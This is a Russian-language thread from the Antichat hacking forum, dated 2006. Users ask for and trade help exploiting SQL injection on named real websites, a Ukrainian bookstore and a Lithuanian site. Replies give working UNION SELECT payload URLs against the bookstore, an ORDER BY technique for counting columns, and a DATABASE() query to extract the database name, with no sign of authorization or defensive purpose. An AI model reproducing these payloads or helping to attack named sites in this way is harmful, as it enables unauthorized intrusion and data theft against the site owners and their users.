ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-injection
  #1  
Старый 02.05.2006, 12:24
Аватар для [alg0n
[alg0n
Новичок
Регистрация: 02.05.2006
Сообщений: 2
Провел на форуме:
14433

Репутация: 0
Unhappy SQL-injection

Помогите плизз! Я обнаружил возможность sql-injection на сайте :
http://kniga.com.ua/index.php?Lev=product_info&id=881'
Пробовал так :
http://kniga.com.ua/index.php?Lev=pr...+select+null/*
и так :
http://kniga.com.ua/index.php?Lev=pr...ct+null,null/*
Уже практически все попробовал. Нифига. Или ошибка mysql_fetch_array вылезает или страница с книгой открывается.
Может я что-то в синтаксисе упустил?
 
Ответить с цитированием

  #2  
Старый 02.05.2006, 13:06
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
 
Ответить с цитированием

  #3  
Старый 02.05.2006, 13:46
Аватар для Deem3n®
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию

Цитата:
Сообщение от virgoz  
http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
[flame]
в этом случае проще количество столбцов перебирать вот таким способом:
__http://site.com/index.php?Lev=product_info&id=-1'+order by x/*
x = 1 ... n
Если при x = n вылетает ошибка то количество столбцов n-1
В этом случае ошибка вылетает при х=21
http://kniga.com.ua/index.php?Lev=product_info&id=-883' order by 21/*
[/flame]
ЗЫ: сорри за флейм просто не удержался и запостил когда увидел такую длинную ссылку
 
Ответить с цитированием

  #4  
Старый 02.05.2006, 16:03
Аватар для [alg0n
[alg0n
Новичок
Регистрация: 02.05.2006
Сообщений: 2
Провел на форуме:
14433

Репутация: 0
Question

А не подскажете как узнать имя таблицы через sql-injection? На примере с www.kinga.com.ua.
Например узнать имя БД : вместо null подставить DATABASE(). Есть ли в MySQL такие средства?
 
Ответить с цитированием

  #5  
Старый 21.05.2006, 13:15
Аватар для Metvill
Metvill
Новичок
Регистрация: 21.05.2006
Сообщений: 7
Провел на форуме:
24675

Репутация: 0
По умолчанию

Цитата:
Сообщение от [alg0n  
А не подскажете как узнать имя таблицы через sql-injection? На примере с www.kinga.com.ua.
Например узнать имя БД : вместо null подставить DATABASE(). Есть ли в MySQL такие средства?
http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,DATABASE(),4,5,6,7,8,9,10,11 ,12,13,14 ,15,16,17,18,19,20/*

Народ, может и не тут пишу, но нужно узнать возмжна ли sql-injection на сайте http://www.e-d.lt/?ru=1117522100' и если можно пример, для меня это очень важно.

Последний раз редактировалось Metvill; 24.05.2006 в 16:57..
 
Ответить с цитированием

  #6  
Старый 24.05.2006, 16:57
Аватар для Metvill
Metvill
Новичок
Регистрация: 21.05.2006
Сообщений: 7
Провел на форуме:
24675

Репутация: 0
По умолчанию

а вопрос то кажется несложным, чтож так никто и не знает?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ